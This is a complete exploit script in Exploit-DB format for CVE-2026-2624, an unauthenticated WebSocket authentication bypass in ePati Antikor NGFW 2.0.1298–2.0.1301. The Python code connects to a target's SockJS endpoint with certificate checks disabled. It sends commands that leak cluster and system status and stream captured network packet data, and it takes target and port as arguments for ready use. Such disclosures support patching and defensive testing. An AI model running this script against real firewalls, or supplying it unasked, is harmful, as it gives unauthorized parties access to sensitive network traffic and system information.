# Exploit Title: ePati Antikor NGFW 2.0.1301 -  Authentication Bypass 
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624

import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time

def banner():
    print("-" * 65)
    print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
    print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
    print("-" * 65)

def generate_random_id(length=8):
    """Generates a random session ID for the SockJS connection."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def exploit(target_ip, target_port):
    # Generating random server and session IDs for SockJS
    server_id = random.randint(100, 999)
    session_id = generate_random_id()
    
    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")

    try:
        # Bypassing Self-Signed SSL certificate verifications
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        ws.connect(ws_url)
        print("[+] Connection Successful! (Authentication bypassed)\n")
        
        # Payload 1: Listening to Cluster and System Status
        payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
        print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
        ws.send(payload_1)

        # Wait for the response from the server
        time.sleep(1) 
        response_1 = ws.recv()
        
        if response_1:
            print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
            print(f"> {response_1}\n")
        
        # Payload 2: Listening to Network Packets
        payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
        print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
        ws.send(payload_2)
        
        time.sleep(1)
        response_2 = ws.recv()
        
        if response_2:
            print("[+] Network packet data captured:")
            print(f"> {response_2}\n")

        print("[*] Exploitation complete. Closing connection.")
        ws.close()

    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)

if __name__ == "__main__":
    banner()
    
    # Argument parsing
    parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
    parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
    parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")
    
    args = parser.parse_args()
    
    exploit(args.target, args.port)